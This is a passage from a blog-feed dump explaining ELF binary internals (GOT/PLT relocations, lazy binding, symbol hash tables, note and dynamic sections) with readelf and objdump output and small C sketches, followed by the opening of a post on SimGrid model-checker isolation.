Relocation section '.rela.text' at offset 0x250 contains 1 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000000003  000b00000009 R_X86_64_GOTPCREL 0000000000000000 foo - 4\n
\n\n

It asks the link editor to generate a GOT entry for the address of\nfoo and fill the relative address of this GOT entry in the\ninstruction (movq foo@GOTPCREL(%rip), %rax). The link editor\ncreates the GOT entry.

\n

An addend of -4 is used because the relative instructions in x86 are\nusing the address of the next instruction as a base\naddress.

\n

Shared-object

\n

At runtime, the GOT entry needs to be filled by the dynamic linker. In\norder to do this, the link editor creates a relocation for the GOT\nentry in the shared-object:

\n
Relocation section '.rela.dyn' at offset 0x458 contains 9 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000200990  000800000006 R_X86_64_GLOB_DAT 00000000002009ec foo + 0\n
\n\n

This relocation entry fills the third entry of the GOT (.got)1:

\n
\n[19] .got              PROGBITS         0000000000200980  00000980\n     0000000000000030  0000000000000008  WA       0     0     8\n
\n\n

PLT

\n

The Procedure Linkage Table (PLT) is used for calling functions whose\naddress is not known at link time (because they might be in another\nshared-object or the executable). The PLT can be disassembled with\nobjdump -D -j .plt.

\n

For example this code:

\n
#include <stdlib.h>\n\nint main(int argc, char** argv)\n{\n  abort();\n  return 0;\n}\n
\n\n\n

is compiled into (gcc test.c -S -o- -fPIC -O3):

\n
main:\n        subq    $8, %rsp\n        call    abort\n
\n\n\n

When disassembling the resulting executable we find that the call to\nabort has been replaced by a call to a stub abort@plt (called a\ntrampoline):

\n
0000000000400410 <main>:\n  400410:       48 83 ec 08             sub    $0x8,%rsp\n  400414:       e8 c7 ff ff ff          callq  4003e0 <abort@plt>\n
\n\n

This trampoline fetches the address of abort in the GOT and\njumps to this address:

\n
00000000004003e0 <abort@plt>:\n  4003e0:       ff 25 ea 04 20 00       jmpq   *0x2004ea(%rip)  # 6008d0 <_GLOBAL_OFFSET_TABLE_+0x18>\n  4003e6:       68 00 00 00 00          pushq  $0x0\n  4003eb:       e9 e0 ff ff ff          jmpq   4003d0 <_init+0x28>\n
\n\n

All of this is done by the first instruction of this PLT trampoline:\nthe two remaining instructions are used for lazy relocation which is\nexplained afterwards.

\n

A relocation exists in order to store the address of abort in this PLT\nGOT entry:

\n
Relocation section '.rela.plt' at offset 0x360 contains 3 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n0000006008d0  000100000007 R_X86_64_JUMP_SLO 0000000000000000 abort +\n
\n\n

Lazy relocations

\n

Relocation in dynamic linking can slow down the initialisation of the\napplication: each symbol must be looked up in all loaded DSOs and the\nexecutable. In order to speed up the relocation of programs, lazy\nrelocation is used for function calls17: the corresponding PLT\nGOT entry is not filled with the address of the function at\nprocess initialisation but only when the function is actually called.

\n
# Special .PLT0 entry:\n00000000004003d0 :\n  4003d0:  ff 35 ea 04 20 00   pushq  0x2004ea(%rip)  # 6008c0 <_GLOBAL_OFFSET_TABLE_+0x8>\n  4003d6:  ff 25 ec 04 20 00   jmpq   *0x2004ec(%rip) # 6008c8 <_GLOBAL_OFFSET_TABLE_+0x10>\n  4003dc:  0f 1f 40 00\n\n# .PLT1 for abort:\n00000000004003e0 <abort@plt>:\n  4003e0:  ff 25 ea 04 20 00   jmpq   *0x2004ea(%rip) # 6008d0 <_GLOBAL_OFFSET_TABLE_+0x18>\n  4003e6:  68 00 00 00 00      pushq  $0x0\n  4003eb:  e9 e0 ff ff ff      jmpq   4003d0 <_init+0x28>\n
\n\n
    \n
  1. \n

    The dynamic linker preinitialises the PLT GOT,

    \n\n
  2. \n
  3. \n

    on the first call of the PLT trampoline abort@plt,

    \n

    a. the first instruction of the trampoline jumps to the second\n instruction of the trampoline;

    \n

    b. the second instruction of the PLT pushes on the stack the index\n of this relocation in the relocation table (from DT_JMPREL);

    \n

    c. the third instruction jumps to the first entry of the PLT\n (.PLT0);

    \n

    d. this entry pushes the second entry of the PLT GOT on the stack\n (this is used by the dynamic linker to identify this\n shared-object);

    \n

    e. this entry jumps to the callback of the dynamic linker;

    \n

    f. the dynamic linker does the real relocations,

    \n\n

    g. the function is executed;

    \n
  4. \n
  5. \n

    on other calls, the PLT GOT entry now contains the address of the\n function and the PLT entry jumps to it directly (instead of jumping\n to .PLT0 and to the dynamic linker).

    \n
  6. \n
\n

In the section header table:

\n\n

In the dynamic section:

\n\n

PLT example for x86_64

\n

Compilation

\n

This time let's compile a function call:

\n
extern int foo(void);\n\nint get_foo()\n{\n  return foo() + 42;\n}\n
\n\n\n

We get this assembly (cc -O3 -S -fpic):

\n
get_foo:\n.LFB0:\n        subq    $8, %rsp\n        call    foo@PLT\n        addq    $8, %rsp\n        addl    $42, %eax\n        ret\n
\n\n\n

The foo@PLT asks the assembler to use the address of a PLT entry for\nthe foo function.

\n

Relocatable object

\n

We get this relocation in the relocatable object:

\n
Relocation section '.rela.text' at offset 0x260 contains 1 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000000005  000b00000004 R_X86_64_PLT32    0000000000000000 foo - 4\n
\n\n

It asks the link editor to patch the instruction with the 32-bit\nrelative address of the PLT entry for symbol foo. The link editor\ncreates a PLT entry, a corresponding PLT GOT entry (in the .got.plt\nsection) and a relocation entry for this PLT GOT entry (in\n.rela.plt).

\n

Shared-object

\n

We get this relocation in the shared-object:

\n
Relocation section '.rela.plt' at offset 0x4f0 contains 3 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000200960  000400000007 R_X86_64_JUMP_SLO 0000000000000000 foo + 0\n
\n\n

This relocation entry asks the dynamic linker to lazily initialise\nthe PLT GOT entry:

\n
    \n
  1. \n

it will first fill the PLT GOT entry with the address of the second\n instruction of the associated PLT entry;

    \n
  2. \n
  3. \n

when the PLT entry is called, it will call the dynamic linker which will\n initialise the PLT GOT entry with the address of the foo symbol.

    \n
  4. \n
\n

Some x86_64 relocations

\n

Link time relocation:

\n\n

Runtime relocations:

\n\n

Some x86 relocations

\n\n

Hash tables

\n

Standard hash table

\n

The standard hash table is built by the link editor. It is described\nby the .hash SHT_HASH section and by the DT_HASH entry in the\ndynamic section. Its structure is quite\nsimple:

\n
// Pseudo-C:\nstruct {\n  Elf32_Word nbucket;          /* Number of buckets */\n  Elf32_Word nchain;           /* Number of entries in .dynsym */\n  Elf32_Word buckets[nbucket]; /* First entry in the chain */\n  Elf32_Word chains[nchain];   /* Next entry in the chain */\n};\n
\n\n\n\n

The lookup looks like this:

\n
Elf64_Sym const* lookup_symbol(\n  const char* symbol,\n  Elf64_Sym const* symbol_table,\n  const char* string_table,\n  Elf32_Word const* hash_table)\n{\n  Elf32_Word nbucket        = hash_table[0];\n  Elf32_Word nchain         = hash_table[1]; /* number of symbols */\n  Elf32_Word const* buckets = hash_table + 2;\n  Elf32_Word const* chains  = hash_table + 2 + nbucket;\n\n  unsigned long hash = elf_hash(symbol);\n\n  // Iterate on the chain, starting at the bucket for this hash:\n  for (Elf32_Word index = buckets[hash % nbucket];\n       index != STN_UNDEF;\n       index = chains[index])\n    if (strcmp(symbol, string_table + symbol_table[index].st_name) == 0)\n      return symbol_table + index;\n\n  return NULL;\n}\n
\n\n\n

GNU hash table

\n

The GNU hash table is a more efficient alternative to the standard\nhash table18. Both can be present in the same ELF file but\nmodern GNU ELF files usually only contain the GNU hash table. It is\ndescribed by the .gnu.hash SHT_GNU_HASH section and by the\nDT_GNU_HASH entry in the dynamic section.

\n

Main differences:

\n\n
// Pseudo-C:\nstruct Gnu_Hash_Header {\n  uint32_t nbuckets;\n  uint32_t symndx;    /* Index of the first accessible symbol in .dynsym */\n  uint32_t maskwords; /* Number of elements in the Bloom filter */\n  uint32_t shift2;    /* Shift count for the Bloom filter */\n  uintXX_t bloom_filter[maskwords];\n  uint32_t buckets[nbuckets];\n  uint32_t values[dynsymcount - symndx];\n};\n
\n\n\n
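The GNU hash table uses a different hash function (`dl_new_hash` in glibc), a simple DJB-style hash. The same value both selects the bucket (`h % nbuckets`) and probes the Bloom filter (using `h` and `h >> shift2`). A sketch:

```c
#include <stdint.h>

/* GNU hash function (dl_new_hash in glibc): DJB-style hash.
   The result selects the bucket (h % nbuckets) and is also used
   to probe the Bloom filter (with h and h >> shift2). */
uint32_t gnu_hash(const char *s)
{
    uint32_t h = 5381;
    while (*s != '\0')
        h = h * 33 + (unsigned char)*s++;
    return h;
}
```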

Notes

\n

Each entry of a note section begins with:

\n
typedef struct {\n  Elf64_Word n_namesz;  /* Length of the note's name.  */\n  Elf64_Word n_descsz;  /* Length of the note's descriptor.  */\n  Elf64_Word n_type;    /* Type of the note.  */\n} Elf64_Nhdr;\n
\n\n\n

After this comes the note name and the note content:

\n\n

Padding is used after the name and the content of the note to ensure\n 4 byte alignment.

\n

Each note is usually in its own section (.note.XXX) but they are all\ngrouped in the same program entry. readelf -n can display the notes.

\n
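As a sketch of this layout, a walker applying the 4-byte padding rule between the name and descriptor fields could look like the following (`Nhdr` mirrors `Elf64_Nhdr`; `count_notes` is an illustrative helper, not part of any real API):

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

typedef struct {
    uint32_t n_namesz; /* Length of the note's name */
    uint32_t n_descsz; /* Length of the note's descriptor */
    uint32_t n_type;   /* Type of the note */
} Nhdr;

/* Round up to the 4-byte alignment used between note fields. */
static uint32_t align4(uint32_t x) { return (x + 3u) & ~3u; }

/* Count the notes in a buffer holding the raw content of a note
   section: each entry is a header, then the name, then the
   descriptor, both padded to a 4-byte boundary. */
size_t count_notes(const unsigned char *p, size_t size)
{
    size_t off = 0, count = 0;
    while (off + sizeof(Nhdr) <= size) {
        Nhdr hdr;
        memcpy(&hdr, p + off, sizeof hdr);
        off += sizeof hdr + align4(hdr.n_namesz) + align4(hdr.n_descsz);
        if (off > size)
            break; /* Truncated note */
        count++;
    }
    return count;
}
```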

GNU notes

\n

GNU notes are using the string \"GNU\" (with a terminating 0 byte) and\ndefine the notes:

\n\n

The first 32-bit word is the target system (ELF_NOTE_OS_LINUX for Linux)\n and the following three words are a minimum kernel version number.

\n

Example (GNU/Linux 2.6.32):

\n

Hex dump of section '.note.ABI-tag':\n   0x0040021c 04000000 10000000 01000000 474e5500 ............GNU.\n   0x0040022c 00000000 02000000 06000000 20000000 ............ ...\n   
\n\n

Example (d53a4435d14a5ac3009bad8c6f840175b37aa86a):

\n

Hex dump of section '.note.gnu.build-id':\n  0x00400274 04000000 14000000 03000000 474e5500 ............GNU.\n  0x00400284 d53a4435 d14a5ac3 009bad8c 6f840175 .:D5.JZ.....o..u\n  0x00400294 b37aa86a                            .z.j\n  
\n\n

CORE notes

\n

See Anatomy of an ELF core file.

\n

LINUX notes

\n

See Anatomy of an ELF core file.

\n

Dynamic section

\n

The dynamic section provides important information for the dynamic\nlinker. A statically linked executable does not have a PT_DYNAMIC\nentry.

\n

It is an array of entries with the structure:

\n
typedef struct {\n  Elf64_Sxword  d_tag;   /* Dynamic entry type */\n  union {\n    Elf64_Xword d_val; /* Integer value */\n    Elf64_Addr d_ptr;  /* Address value */\n  } d_un;\n} Elf64_Dyn;\n
\n\n\n

readelf -d can display the content of the dynamic section.

\n

The dynamic table is available at runtime with the _DYNAMIC local\nsymbol. A DT_NULL entry marks the end of the dynamic section.

\n
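A minimal sketch of scanning such a table up to its `DT_NULL` terminator (`Dyn` and `dyn_count` are simplified, illustrative definitions mirroring `elf.h`'s `Elf64_Dyn`; at runtime the real table is reachable through the `_DYNAMIC` symbol):

```c
#include <stddef.h>
#include <stdint.h>

#define DT_NULL 0 /* Marks the end of the dynamic section */

/* Simplified 64-bit dynamic entry (see elf.h's Elf64_Dyn). */
typedef struct {
    int64_t  d_tag; /* Dynamic entry type */
    uint64_t d_val; /* Integer or address value */
} Dyn;

/* Count the entries of a dynamic table, excluding the DT_NULL
   terminator. */
size_t dyn_count(const Dyn *d)
{
    size_t n = 0;
    while (d[n].d_tag != DT_NULL)
        n++;
    return n;
}
```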

Shared objects

\n\n

RPATH

\n

The DT_RUNPATH entry (and DT_RPATH 20) defines additional paths\nwhere the shared-objects should be searched.

\n

The dynamic linker (ld.so) recognises several special values in\nDT_RUNPATH (and DT_RPATH):

\n\n

The DT_RPATH can be set with ld -rpath='$ORIGIN' (or gcc\n-Wl,-rpath='$ORIGIN'). ld --enable-new-dtags might be needed to add\nthe DT_RUNPATH entries as well.

\n

Symbols

\n\n

The type of hash table generated by the link editor can be chosen with\nld --hash-style=sysv|gnu|both. By default, the GNU hash table\nis used on (not-too-old) GNU systems.

\n

Symbol versions

\n

DT_VERSYM, DT_VERNEED and DT_VERNEEDNUM are used for GNU symbol\nversioning.

\n

Relocations

\n

At runtime there are usually two different relocation tables: the main\nrelocation table and the PLT relocation table.

\n

The main relocation table (.rela.dyn section) is located with\nDT_RELA (address), DT_RELASZ (byte size of the relocation table),\nDT_RELAENT (byte size of a relocation entry) for relocation tables\nwith addend. The main relocation table without addend uses DT_REL,\nDT_RELSZ and DT_RELENT.

\n

Another relocation table (.rela.plt section) is used for the PLT.\nIt is located with: DT_JMPREL (address) and DT_PLTRELSZ (byte size\nof the relocation table). The DT_PLTREL gives the type of relocation\ntable (either DT_RELA or DT_REL) used for the PLT.

\n

The DT_PLTGOT is the address of the PLT GOT (.got.plt). The\ndynamic linker needs to know it because the first entries of the PLT\nGOT are used by the dynamic linker.

\n

Symbol lookup

\n

Each relocation implies a symbol lookup.

\n

In ELF, symbol resolution is using a mostly3\nflat-namespace22: a used symbol is not bound to a specific\nDSO and it is searched in the executable and all DSOs with\nbreadth-first search30 (using the order of the DT_NEEDED entries).

\n

This search is O(#modules). For each executable or shared-object, a\nhash table (DT_HASH, DT_GNU_HASH or both) is included in the file\n(and available at runtime) in order to speed up the symbol lookup.

\n

Flags

\n

DT_FLAGS is a field of flags:

\n\n

Initialisation and termination functions

\n

Initialisation functions are called in this order:

\n
    \n
  1. \n

    DT_PREINIT_ARRAY array (of byte size DT_PREINIT_ARRAYSZ) of\n preinitialisation function addresses.

    \n
  2. \n
  3. \n

    DT_INIT, address of an initialisation function (the .init\n section);

    \n
  4. \n
  5. \n

    DT_INIT_ARRAY array (of byte size DT_INIT_ARRAYSZ) of\n initialisation function addresses.

    \n
  6. \n
\n

Termination functions are called in this order:

\n
    \n
  1. \n

DT_FINI_ARRAY array (of byte size DT_FINI_ARRAYSZ) of\n termination function addresses;

    \n
  2. \n
  3. \n

    DT_FINI address of a termination function respectively (.fini\n sections).

    \n
  4. \n
\n

Debug interface

\n

If a DT_DEBUG entry is present, this value will be set by the\ndynamic linker to a pointer to the address of a struct r_debug\n(see link.h):

\n
struct r_debug\n{\n  int r_version;          /* Version number for this protocol. */\n  struct link_map *r_map; /* Head of the chain of loaded objects.  */\n  ElfW(Addr) r_brk;\n  enum {\n    RT_CONSISTENT,        /* Mapping change is complete.  */\n    RT_ADD,               /* Beginning to add a new object.  */\n    RT_DELETE             /* Beginning to remove an object mapping.  */\n  } r_state;\n  ElfW(Addr) r_ldbase;    /* Base address the linker is loaded at.  */\n};\n
\n\n\n

This can be used to traverse the list of executables and\nshared-objects (of a given namespace):

\n
struct link_map {\n  /* These first few members are part of the protocol with the debugger.\n     This is the same format used in SVR4.  */\n  ElfW(Addr) l_addr;          /* Difference between the address in the ELF\n                                 file and the addresses in memory.  */\n  char *l_name;               /* Absolute file name object was found in.  */\n  ElfW(Dyn) *l_ld;            /* Dynamic section of the shared object.  */\n  struct link_map *l_next, *l_prev; /* Chain of loaded objects.  */\n};\n
\n\n\n

The struct link_map can be obtained at runtime with dlinfo(handle,\nRTLD_DI_LINKMAP, &res).

\n
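For illustration, walking such a chain can be sketched as follows (`mini_link_map` is a minimal mirror of the public `link_map` fields; the real declaration lives in `<link.h>` and the head of the chain comes from `r_debug.r_map` or `dlinfo(handle, RTLD_DI_LINKMAP, &res)`):

```c
#include <stddef.h>

/* Minimal mirror of the public part of glibc's struct link_map
   (the real definition is in <link.h>). */
struct mini_link_map {
    unsigned long l_addr;  /* Difference between file and memory addresses */
    char *l_name;          /* Absolute file name */
    void *l_ld;            /* Dynamic section of the object */
    struct mini_link_map *l_next, *l_prev; /* Chain of loaded objects */
};

/* Count loaded objects by following the chain from its head. */
size_t count_loaded_objects(const struct mini_link_map *map)
{
    size_t n = 0;
    for (; map != NULL; map = map->l_next)
        n++;
    return n;
}
```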

String table

\n

DT_STRTAB and DT_STRSZ give the location and byte size of the string\ntable used by the dynamic section (.dynstr).

\n

Symbol versions

\n

Those entries are GNU extensions for versioning of symbol:

\n\n

Not covered (much) here

\n

GNU symbol versioning

\n

Main structures:

\n\n

See the LSB.

\n

TLS

\n

The ELF file contains an initialisation image for the TLS data:

\n\n

See ELF Handling For Thread Local\nStorage.

\n

COMDAT

\n

COMDAT refers to the ability of the static linker to remove redundant\ncode and data when combining different .o files. This is used in C++\nwhen instantiating templates. In order to do this, the compiler\ncreates dedicated sections for each template instantiation.

\n

For example, this C++ code:

\n
#include <string>\n\nstd::string foo(std::string& x)\n{\n  return x + x;\n}\n
\n\n\n

Generates the following sections in the relocatable object:

\n
$ readelf -WS test.o\nThere are 26 section headers, starting at offset 0xc058:\n\nSection Headers:\n  [Nr] Name              Type            Address          Off    Size   ES Flg Lk Inf Al\n  [ 0]                   NULL            0000000000000000 000000 000000 00      0   0  0\n  [ 1] .group            GROUP           0000000000000000 000040 00000c 04     24  18  4\n  [ 2] .text             PROGBITS        0000000000000000 00004c 00002d 00  AX  0   0  1\n  [ 3] .rela.text        RELA            0000000000000000 008278 000018 18   I 24   2  8\n  [ 4] .data             PROGBITS        0000000000000000 000079 000000 00  WA  0   0  1\n  [ 5] .bss              NOBITS          0000000000000000 000079 000000 00  WA  0   0  1\n  [ 6] .text._ZStplIcSt11char_traitsIcESaIcEENSt7__cxx1112basic_stringIT_T0_T1_EERKS8_SA_ PROGBITS        0000000000000000 000079 000062 00 AXG  0   0  1\n  [ 7] .rela.text._ZStplIcSt11char_traitsIcESaIcEENSt7__cxx1112basic_stringIT_T0_T1_EERKS8_SA_ RELA            0000000000000000 008290 000060 18   I 24   6  8\n  [ 8] .gcc_except_table._ZStplIcSt11char_traitsIcESaIcEENSt7__cxx1112basic_stringIT_T0_T1_EERKS8_SA_ PROGBITS        0000000000000000 0000db 000010 00  AG  0   0  1\n[...]\n
\n\n

Section\ngroups\n(sections with .group name and SHT_GROUP type) are used to group\nrelated sections: the first Elf32_Word of the group section is a set\nof flags (GRP_COMDAT is used for COMDAT section groups) and the\nremaining Elf32_Word of the section are the indices of the sections\nbelonging to this group.

\n
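A sketch of decoding the content of a group section under this layout (`parse_group` is a hypothetical helper, not a real API):

```c
#include <stdint.h>
#include <stddef.h>

#define GRP_COMDAT 0x1 /* Flag marking a COMDAT section group */

/* The content of a SHT_GROUP section is an array of Elf32_Words:
   word 0 is a set of flags, the remaining words are the indices of
   the member sections. Returns the number of members. */
size_t parse_group(const uint32_t *words, size_t nwords,
                   uint32_t *flags, const uint32_t **members)
{
    if (nwords == 0)
        return 0;
    *flags = words[0];
    *members = words + 1;
    return nwords - 1;
}
```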

ARM

\n\n

References

\n

Authoritative references

\n\n

Blogs posts, articles, books and such

\n\n
\n
\n
    \n
  1. \n

    The address of the GOT entry is 0x200990 and the address of\n.got is 0x200980: the offset of the GOT entry within .got is\n0x200990 - 0x200980 = 0x10 = 16. Each GOT entry is 8 bytes on\nx86_64 so this is the third entry.\u00a0\u21a9

    \n
  2. \n
  3. \n

GNU objdump and objcopy both rely on\nBFD and are unable to see\nsome sections (and can synthesise some others) because of the\nfile-format abstraction of the BFD library. objdump from\nelfutils (called eu-objdump on some distributions) does not have\nthis limitation (but only supports a limited subset of the features of\nGNU objdump).\u00a0\u21a9

    \n
  4. \n
  5. \n

Solaris and GNU systems have the ability to handle different\nnamespaces\n(see\ndlmopen()):\ndifferent shared-objects can be placed in different namespaces.\nUsually only two namespaces are used: one for the dynamic linker\nand a second one for the application and the shared-object\nlibraries.\u00a0\u21a9

    \n
  6. \n
  7. \n

    The C structures (and the associated comments) are taken from the\nGNU elf.h file. Only the 64 bit variant is displayed here.\u00a0\u21a9

    \n
  8. \n
  9. \n

For example, it is used for\nARM-based\nembedded software.\u00a0\u21a9

    \n
  10. \n
  11. \n

Notable exceptions are the Apple systems (MacOS X, iOS, Darwin)\nwhich use their own Mach-O format (coming from their NeXTSTEP\nlineage) and Microsoft systems (Windows) which use the PE file\nformat (which is based on the old Unix System V COFF format).\u00a0\u21a9

    \n
  12. \n
  13. \n

    I wrote this tool because objcopy --dump-section was not\ncompletely satisfying.\u00a0\u21a9\u21a9

    \n
  14. \n
  15. \n

    This is an extension to the ELF standard\nnot documented in the specification.\u00a0\u21a9

    \n
  16. \n
  17. \n

    In contrast to PE files, the (readonly) text segment (such as the\ncode) is shared for all processes (and with the filesystem cache)\neven if the shared-object is loaded at different addresses. In\norder to achieve this, the code for shared-objects should be\ncompiled as\nPIC.

    \n

    PE files are built with a preferred address and if they must be\nrelocated, the code becomes private to the process. In other\nwords, Windows DLL do not use PIC.\u00a0\u21a9

    \n
  18. \n
  19. \n

    They are using PIC\n code. They\n must be compiled with cc -fpic (or -fPIC).\u00a0\u21a9

    \n
  20. \n
  21. \n

    They are compiled with cc -fpie (or -fPIE).\u00a0\u21a9

    \n
  22. \n
  23. \n

    With the GNU BFD linker, the layout of sections after linking is\ngiven by a linker\nscript. The\ndefault linker script can be seen with ld -verbose. Another\nlinker script can be used with ld -T some_linker_script.\u00a0\u21a9

    \n
  24. \n
  25. \n

    However they can use other techniques such as GOT\ninfection and ROP.\u00a0\u21a9

    \n
  26. \n
  27. \n

This property is so important that the\nMPROTECT feature\nof PaX (a Linux patch) prevents\nthe existence of VMAs which are both executable and writable in\nmost cases in order to enhance security.\u00a0\u21a9

    \n
  28. \n
  29. \n

    In C, symbols have the name of the corresponding C function or\nvariable on ELF systems.

    \n

    In C++, function overloading, templates, namespaces and so on make\nit more difficult. The name of the object (including the types of\nits arguments for functions) is mangled to form the\nsymbol. Different name mangling schemes exist, but modern versions\nof GCC and clang use the name mangling of the C++ Itanium\nABI:\nFor example with this ABI, the foo::Something::bar(int) method\nis mangled into _ZN3foo9Something3barEi. The c++filt program\ncan be used to demangle C++ symbol names (or the __cxa_demangle\nfunction).\u00a0\u21a9

    \n
  30. \n
  31. \n

    The usage of STV_PROTECTED symbols is not recommended because it\nslows down the dynamic\nlinkage.\u00a0\u21a9

    \n
  32. \n
  33. \n

    The usage of the PLT can be disabled at compile-time (for a given\ncompilation unit) with cc -fno-plt or for a given function with\n__attribute__((noplt)). This disables lazy binding.\u00a0\u21a9

    \n
  34. \n
  35. \n

See GNU Hash ELF\nSection\nby Ali Bahrami and How to write Shared\nLibraries\nby Ulrich Drepper.\u00a0\u21a9

    \n
  36. \n
  37. \n

    Each shared-object dependency is described with a DT_NEEDED\nentry. A typical value is libfoo.so.6 (where 6 is a version\nnumber). This file is searched in different directories by the\ndynamic linker. A same shared object can be present in different\nincompatible versions.

    \n

The link editor ld links against libfoo.so (using the -lfoo\nflag) which is a symbolic link to the current version of the\nshared object. Shared objects usually contain a DT_SONAME entry\ndefining the full (shared-object) name (libfoo.so.6) of this\nshared-object. This value is copied as a DT_NEEDED entry in the\ndependent ELF objects.

    \n

    If no DT_SONAME is present, the link editor creates a\nDT_NEEDED entry with libfoo.so instead when given the -lfoo\nflags.

    \n

    If a full path to the shared object is given to ld and this\nshared object does not have DT_SONAME entry, the full path to\nthe shared object will be used in the DT_NEEDED entry.\u00a0\u21a9

    \n
  38. \n
  39. \n

DT_RPATH serves the same purpose but is searched before the\nLD_LIBRARY_PATH environment variable, which is not considered a\ngood behaviour. For this reason, DT_RUNPATH was created as a\nreplacement: the values of DT_RUNPATH are searched after the\nLD_LIBRARY_PATH environment variable. DT_RPATH is deprecated and\nignored when DT_RUNPATH is present (and recognised by the\ndynamic linker).\u00a0\u21a9

    \n
  40. \n
  41. \n

There is no size/number of entries for the symbol table at the\nprogram header table level. This is not needed at runtime as the\nsymbol lookup always goes through the hash table.\u00a0\u21a9

    \n
  42. \n
  43. \n

This is in contrast with Windows PE files and MacOS X Mach-O files, which both\nuse a two-level namespace lookup: they import a given symbol from\na given DLL or .dylib.\u00a0\u21a9

    \n
  44. \n
  45. \n

This means that there is usually no runtime relocation in the text\nsegment: all the runtime relocations are done in the data segment.

    \n

If the DF_TEXTREL flag is present (or a DT_TEXTREL dynamic\ntable entry is present), text relocations are present in this\nfile.\u00a0\u21a9

    \n
  46. \n
  47. \n

    The DT_TEXTREL dynamic table entry can be used as well but its\nusage is deprecated/optional.\u00a0\u21a9

    \n
  48. \n
  49. \n

    For relocation sections which apply to a single section, the\nsh_info field is the index of the target section.\u00a0\u21a9

    \n
  50. \n
  51. \n

    The PLT GOT is still vulnerable to GOT\npoisoning.\u00a0\u21a9

    \n
  52. \n
  53. \n

Static libraries (.a files) are archives of .o\nfiles. Different formats exist for them.\u00a0\u21a9

    \n
  54. \n
  55. \n

    As a result, the sections in the ELF files are grouped in three\nparts:

    \n
      \n
    1. \n

      the sections which belong to the text segment;

      \n
    2. \n
    3. \n

      the sections which belong to the data segment;

      \n
    4. \n
    5. \n

      the sections which do not belong to any segment (and are not\n available/used at runtime).

      \n
    6. \n
    \n

    \u21a9

    \n
  56. \n
  57. \n

    Prelinked DSOs are located at a given (non-null) address in the\nELF file.\u00a0\u21a9

    \n
  58. \n
  59. \n

    This is a simplification. Other things influence the order and the\nset of ELF modules used for a given lookup: DT_SYMBOLIC,\ndlopen(), dlmopen() etc.

    \n

dlopen-ed shared-objects and their dependencies are not added to\nthe global scope but only to a local scope (unless RTLD_GLOBAL\nis used).

    \n

    dlmopen() can be used to create separate symbol namespaces with\ntheir own sets of ELF shared-objects.\u00a0\u21a9

    \n
  60. \n
  61. \n

    The .debug_frame DWARF section is used to tell the debugger how\nto unwind each stack frame

    \n

    The .eh_frame has been created in order to unwind the stack at\nruntime. This is used for exception handling.

    \n

The .eh_frame section contains information for unwinding the\nframe for each instruction address. This is used by the Itanium C++\nexception ABI to unwind the stack on exceptions. Its format is\nbased on the .debug_frame DWARF section.

    \n

    If it is present the .debug_frame can be omitted.\u00a0\u21a9\u21a9

    \n
  62. \n
  63. \n

.gnu_debuglink is used to locate a separate file containing\ndebug\ninformation.\nAnother solution is to use a NT_GNU_BUILD_ID note.\u00a0\u21a9

    \n
  64. \n
  65. \n

.note.gnu.build-id describes the build-id used to locate a\n separate ELF file containing the debug information. This is the\n NT_GNU_BUILD_ID note.\u00a0\u21a9

    \n
  66. \n
  67. \n

.gnu.warning and .gnu.warning.XXX contain warning messages\ndisplayed by the linker to issue\nwarnings when linking\nagainst this ELF file or this symbol respectively.

    \n

    Example:

    \n

    Hex dump of section '.gnu.warning.gets':\n0x00000000 74686520 60676574 73272066 756e6374 the `gets' funct\n0x00000010 696f6e20 69732064 616e6765 726f7573 ion is dangerous\n0x00000020 20616e64 2073686f 756c6420 6e6f7420  and should not\n0x00000030 62652075 7365642e 00                be used..\n
    \u00a0\u21a9\u21a9\n
  68. \n
  69. \n

    In fact, it creates two GOT sections: .got and .got.plt.\u00a0\u21a9

    \n
  70. \n
  71. \n

    The VMA are the different available/mapped regions in the virtual\naddress space. Each VMA has some properties such as:

    \n
      \n
    • \n

      permissions (rwx);

      \n
    • \n
    • \n

      whether it is shared with other processes (MAP_SHARED) or\n private to this process (MAP_PRIVATE);

      \n
    • \n
    • \n

      whether it has an associated file (and the offset of the VMA\n within the file);

      \n
    • \n
    • \n

      etc.

      \n
    • \n
    \n

    They are created with mmap() (or similar) or directly by the\nkernel. On Linux, they can be seen in /proc/$pid/maps or with\nthe pmap tool.\u00a0\u21a9\u21a9

    \n
  72. \n
  73. \n

This is what appears in the .o file. In the shared-object or\nexecutable, it is converted to STB_LOCAL and STV_DEFAULT.\u00a0\u21a9

    \n
  74. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/09/01/simgrid-mc-rewrite/", "title": "SimGridMC: The Big Split (and Cleanup)", "url": "https://www.gabriel.urdhr.fr/2015/09/01/simgrid-mc-rewrite/", "date_published": "2015-09-01T00:00:00+02:00", "date_modified": "2015-09-01T00:00:00+02:00", "tags": ["computer", "simgrid", "system"], "content_html": "

In my previous SimGrid post, I\ntalked about different solutions for a better isolation between the\nmodel-checked application and the model-checker. We chose to avoid\nthe (hacky) solution based on multiple dynamic-linker namespaces in the\nsame process and use a more conventional process-based isolation.

\n

Motivation

\n

In the previous version of the SimGridMC, the model-checker was\nrunning in the same process as the main SimGrid application. We had in\nthe same process:

\n\n

Multiple heaps

\n

In order to do this, the SimGridMC process was using two different\nmalloc()-heaps in the same process in order to separate:

\n
    \n
  1. \n

    the state of the simulated application (processes states and global\n state);

    \n
  2. \n
  3. \n

    the state of the model-checker.

    \n
  4. \n
\n

The model-checker code had a lot of code to select which heap had to\nbe active (and used by malloc() and friends) at a given point of the\ncode.

\n

This is an example of a function with a lot of heap management calls\n(the lines managing the heap swapping are commented with <*>):

\n
